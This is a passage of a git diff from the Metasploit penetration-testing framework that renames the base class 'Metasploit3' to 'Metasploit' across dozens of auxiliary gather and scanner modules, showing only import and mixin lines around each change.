a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb +++ b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'csv' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb index 2dcc988ec3..14a98b593e 100644 --- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb +++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/gather/xbmc_traversal.rb b/modules/auxiliary/gather/xbmc_traversal.rb index 20191221bd..7212e4cdcb 100644 --- a/modules/auxiliary/gather/xbmc_traversal.rb +++ b/modules/auxiliary/gather/xbmc_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/xerox_pwd_extract.rb b/modules/auxiliary/gather/xerox_pwd_extract.rb index 36920371f8..7b4f0c11af 100644 --- a/modules/auxiliary/gather/xerox_pwd_extract.rb +++ b/modules/auxiliary/gather/xerox_pwd_extract.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb b/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb index acf8953766..6ed0903d37 100644 --- a/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb +++ b/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/parser/unattend.rb b/modules/auxiliary/parser/unattend.rb index 7ad4e310cd..41d69a46af 100644 --- a/modules/auxiliary/parser/unattend.rb +++ b/modules/auxiliary/parser/unattend.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/parser/unattend' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary def initialize(info={}) super( update_info( info, diff --git a/modules/auxiliary/pdf/foxit/authbypass.rb b/modules/auxiliary/pdf/foxit/authbypass.rb index 438a3ecaee..70dab66ac7 100644 --- a/modules/auxiliary/pdf/foxit/authbypass.rb +++ b/modules/auxiliary/pdf/foxit/authbypass.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::FILEFORMAT diff --git a/modules/auxiliary/scanner/acpp/login.rb b/modules/auxiliary/scanner/acpp/login.rb index 10047d1b06..fa8511ead3 100644 --- a/modules/auxiliary/scanner/acpp/login.rb +++ b/modules/auxiliary/scanner/acpp/login.rb @@ -8,7 +8,7 @@ require 'rex/proto/acpp' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/acpp' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/afp/afp_login.rb b/modules/auxiliary/scanner/afp/afp_login.rb index 74aa22c26a..4d25ec841c 100644 --- a/modules/auxiliary/scanner/afp/afp_login.rb +++ b/modules/auxiliary/scanner/afp/afp_login.rb @@ -8,7 +8,7 @@ require 'openssl' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/afp' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/afp/afp_server_info.rb b/modules/auxiliary/scanner/afp/afp_server_info.rb index 5a7c4edc0c..b1f17be410 100644 --- a/modules/auxiliary/scanner/afp/afp_server_info.rb +++ b/modules/auxiliary/scanner/afp/afp_server_info.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb index d48bc8a561..9cb706487d 100644 --- a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb +++ b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/chargen/chargen_probe.rb b/modules/auxiliary/scanner/chargen/chargen_probe.rb index fe43a0e3e5..92202650d6 100644 --- a/modules/auxiliary/scanner/chargen/chargen_probe.rb +++ b/modules/auxiliary/scanner/chargen/chargen_probe.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Capture diff --git a/modules/auxiliary/scanner/couchdb/couchdb_enum.rb b/modules/auxiliary/scanner/couchdb/couchdb_enum.rb index d7242a5e71..c69dd6fe78 100644 --- a/modules/auxiliary/scanner/couchdb/couchdb_enum.rb +++ b/modules/auxiliary/scanner/couchdb/couchdb_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/couchdb/couchdb_login.rb b/modules/auxiliary/scanner/couchdb/couchdb_login.rb index 5782874ac1..a3810b23a8 100644 --- a/modules/auxiliary/scanner/couchdb/couchdb_login.rb +++ b/modules/auxiliary/scanner/couchdb/couchdb_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/db2/db2_auth.rb b/modules/auxiliary/scanner/db2/db2_auth.rb index b5afbe1bab..dfe7e30b87 100644 --- a/modules/auxiliary/scanner/db2/db2_auth.rb +++ b/modules/auxiliary/scanner/db2/db2_auth.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/db2' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::DB2 include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/db2/db2_version.rb b/modules/auxiliary/scanner/db2/db2_version.rb index 3feac07d07..9c09a78c49 100644 --- a/modules/auxiliary/scanner/db2/db2_version.rb +++ b/modules/auxiliary/scanner/db2/db2_version.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::DB2 include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/db2/discovery.rb b/modules/auxiliary/scanner/db2/discovery.rb index 3b6aea526d..bbf372ffa0 100644 --- a/modules/auxiliary/scanner/db2/discovery.rb +++ b/modules/auxiliary/scanner/db2/discovery.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb index f99da3d29f..ea5d33eb4a 100644 --- a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb +++ b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/hidden.rb b/modules/auxiliary/scanner/dcerpc/hidden.rb index 79c2b359f7..2be6d73570 100644 --- a/modules/auxiliary/scanner/dcerpc/hidden.rb +++ b/modules/auxiliary/scanner/dcerpc/hidden.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/management.rb b/modules/auxiliary/scanner/dcerpc/management.rb index 753450426a..3e268a983a 100644 --- a/modules/auxiliary/scanner/dcerpc/management.rb +++ b/modules/auxiliary/scanner/dcerpc/management.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb index 2641054b1f..254dc2e3a8 100644 --- a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb b/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb index d8f2d437cb..fb871424c7 100644 --- a/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb +++ b/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb @@ -8,7 +8,7 @@ require 'rex/proto/dcerpc' require 'rex/proto/dcerpc/wdscp' require 'rex/parser/unattend' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/dect/call_scanner.rb b/modules/auxiliary/scanner/dect/call_scanner.rb index 12c88f72f6..f519f20e41 100644 --- a/modules/auxiliary/scanner/dect/call_scanner.rb +++ b/modules/auxiliary/scanner/dect/call_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::DECT_COA diff --git a/modules/auxiliary/scanner/dect/station_scanner.rb b/modules/auxiliary/scanner/dect/station_scanner.rb index cd1bf10cc4..64a0b9743d 100644 --- a/modules/auxiliary/scanner/dect/station_scanner.rb +++ b/modules/auxiliary/scanner/dect/station_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::DECT_COA diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb index 50df7747c8..34510cee99 100644 --- a/modules/auxiliary/scanner/discovery/arp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/discovery/empty_udp.rb b/modules/auxiliary/scanner/discovery/empty_udp.rb index d64ec3ebd8..5a98e0a34c 100644 --- a/modules/auxiliary/scanner/discovery/empty_udp.rb +++ b/modules/auxiliary/scanner/discovery/empty_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb index 4795a21ae8..af115ccdef 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Exploit::Remote::Ipv6 diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb index c60d28db3a..b770a25ba4 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Ipv6 include Msf::Exploit::Remote::Capture diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index 08e6967dfe..d3e31a79e0 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Exploit::Remote::Ipv6 diff --git a/modules/auxiliary/scanner/discovery/udp_probe.rb b/modules/auxiliary/scanner/discovery/udp_probe.rb index 152f3c7374..8ec57575b6 100644 --- a/modules/auxiliary/scanner/discovery/udp_probe.rb +++ b/modules/auxiliary/scanner/discovery/udp_probe.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/discovery/udp_sweep.rb b/modules/auxiliary/scanner/discovery/udp_sweep.rb index e8222d1e05..b765c51970 100644 --- a/modules/auxiliary/scanner/discovery/udp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/udp_sweep.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb index 21e6d9ffb1..e84a0faf88 100644 --- a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb +++ b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'socket' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/dns/dns_amp.rb b/modules/auxiliary/scanner/dns/dns_amp.rb index 4b448dca11..ce03ad0354 100644 --- a/modules/auxiliary/scanner/dns/dns_amp.rb +++ b/modules/auxiliary/scanner/dns/dns_amp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture diff --git a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb index 0fc0fd14c0..64b7e88327 100644 --- a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb index 98234fe2f9..1e88173ba5 100644 --- a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb index 57e3e108e0..4175296a75 100644 --- a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/finger/finger_users.rb b/modules/auxiliary/scanner/finger/finger_users.rb index e95315b367..4c091646e8 100644 --- a/modules/auxiliary/scanner/finger/finger_users.rb +++ b/modules/auxiliary/scanner/finger/finger_users.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/anonymous.rb b/modules/auxiliary/scanner/ftp/anonymous.rb index 8af1e9cf16..9766426068 100644 --- a/modules/auxiliary/scanner/ftp/anonymous.rb +++ b/modules/auxiliary/scanner/ftp/anonymous.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb index 4970ab3c62..8724683890 100644 --- a/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb +++ b/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ftp/ftp_login.rb b/modules/auxiliary/scanner/ftp/ftp_login.rb index 676ea23753..3965fc0af5 100644 --- a/modules/auxiliary/scanner/ftp/ftp_login.rb +++ b/modules/auxiliary/scanner/ftp/ftp_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/ftp' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/ftp_version.rb b/modules/auxiliary/scanner/ftp/ftp_version.rb index e922b36249..e6dcb783d8 100644 --- a/modules/auxiliary/scanner/ftp/ftp_version.rb +++ b/modules/auxiliary/scanner/ftp/ftp_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb index deceef291b..b13ef51247 100644 --- a/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb +++ b/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb index bcdb39565b..dd9ea3ccd6 100644 --- a/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb +++ b/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb index c29b0bb930..a55c362319 100644 --- a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/h323/h323_version.rb b/modules/auxiliary/scanner/h323/h323_version.rb index 56008ba45a..e701c23729 100644 --- a/modules/auxiliary/scanner/h323/h323_version.rb +++ b/modules/auxiliary/scanner/h323/h323_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb index 82e6fbb881..3cc87aa5ce 100644 --- a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb index bb63c2a7d3..405061855c 100644 --- a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb +++ b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/adobe_xml_inject.rb b/modules/auxiliary/scanner/http/adobe_xml_inject.rb index e801a16c18..aec45503bc 100644 --- a/modules/auxiliary/scanner/http/adobe_xml_inject.rb +++ b/modules/auxiliary/scanner/http/adobe_xml_inject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb index b5d88ff665..586e872408 100644 --- a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/apache_activemq_traversal.rb b/modules/auxiliary/scanner/http/apache_activemq_traversal.rb index fff6aa5d95..b445e5c823 100644 --- a/modules/auxiliary/scanner/http/apache_activemq_traversal.rb +++ b/modules/auxiliary/scanner/http/apache_activemq_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/apache_userdir_enum.rb b/modules/auxiliary/scanner/http/apache_userdir_enum.rb index 483f7acb5d..427922568c 100644 --- a/modules/auxiliary/scanner/http/apache_userdir_enum.rb +++ b/modules/auxiliary/scanner/http/apache_userdir_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/appletv_login.rb b/modules/auxiliary/scanner/http/appletv_login.rb index d2c30f1bf1..739f6e4d67 100644 --- a/modules/auxiliary/scanner/http/appletv_login.rb +++ b/modules/auxiliary/scanner/http/appletv_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/http' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/axis_local_file_include.rb b/modules/auxiliary/scanner/http/axis_local_file_include.rb index c4c029987c..1e17cec220 100644 --- a/modules/auxiliary/scanner/http/axis_local_file_include.rb +++ b/modules/auxiliary/scanner/http/axis_local_file_include.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/axis_login.rb b/modules/auxiliary/scanner/http/axis_login.rb index c806a5df43..8c68f87208 100644 --- a/modules/auxiliary/scanner/http/axis_login.rb +++ b/modules/auxiliary/scanner/http/axis_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/axis2' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/backup_file.rb b/modules/auxiliary/scanner/http/backup_file.rb index 3ac0d740bb..addd523cbe 100644 --- a/modules/auxiliary/scanner/http/backup_file.rb +++ b/modules/auxiliary/scanner/http/backup_file.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb index af42fa9fa9..ddab23fc94 100644 --- a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb index dbaf72cd7e..74d4053934 100644 --- a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb +++ b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/blind_sql_query.rb b/modules/auxiliary/scanner/http/blind_sql_query.rb index 4903073c2a..a8ea76d283 100644 --- a/modules/auxiliary/scanner/http/blind_sql_query.rb +++ b/modules/auxiliary/scanner/http/blind_sql_query.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanUniqueQuery diff --git a/modules/auxiliary/scanner/http/brute_dirs.rb b/modules/auxiliary/scanner/http/brute_dirs.rb index 5ffdf2bbdf..eaadfebfb9 100644 --- a/modules/auxiliary/scanner/http/brute_dirs.rb +++ b/modules/auxiliary/scanner/http/brute_dirs.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'enumerable' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/buffalo_login.rb b/modules/auxiliary/scanner/http/buffalo_login.rb index 26d643853f..3d0bdddabe 100644 --- a/modules/auxiliary/scanner/http/buffalo_login.rb +++ b/modules/auxiliary/scanner/http/buffalo_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/buffalo' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/canon_wireless.rb b/modules/auxiliary/scanner/http/canon_wireless.rb index b9e1cdbf7b..3cfb3753e8 100644 --- a/modules/auxiliary/scanner/http/canon_wireless.rb +++ b/modules/auxiliary/scanner/http/canon_wireless.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/cert.rb b/modules/auxiliary/scanner/http/cert.rb index 